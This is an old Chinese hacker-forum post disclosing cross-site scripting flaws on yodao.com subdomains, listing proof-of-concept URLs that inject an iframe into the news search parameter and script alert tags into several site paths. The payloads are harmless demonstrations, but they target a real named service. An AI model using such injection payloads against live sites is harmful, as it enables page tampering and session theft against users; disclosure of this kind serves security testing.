打印

有道(yodao.com)跨站漏洞(首发)

本主题由 小3 于 2008-8-23 18:47 移动

有道(yodao.com)跨站漏洞(首发)

有道(yodao.com)跨站漏洞(首发)
  发现人:Hack_HT(后天技术联盟——A.T.U)

WEB http://hackht.uu1001.com/

测试代码:

http://news.yodao.com/search?q=<iframe%20src=http://www.baidu.com/%20width=1000%20height=200></iframe>&keyfrom=web.top


http://news.yodao.com/<script>alert("hackht.uu1001.com")</script>
http://www.yodao.com/<script>alert("hackht.uu1001.com")</script>
http://image.yodao.com/<script>alert("hackht.uu1001.com")</script>


截图:




TOP

Processed in 0.038612 second(s), 6 queries, Gzip enabled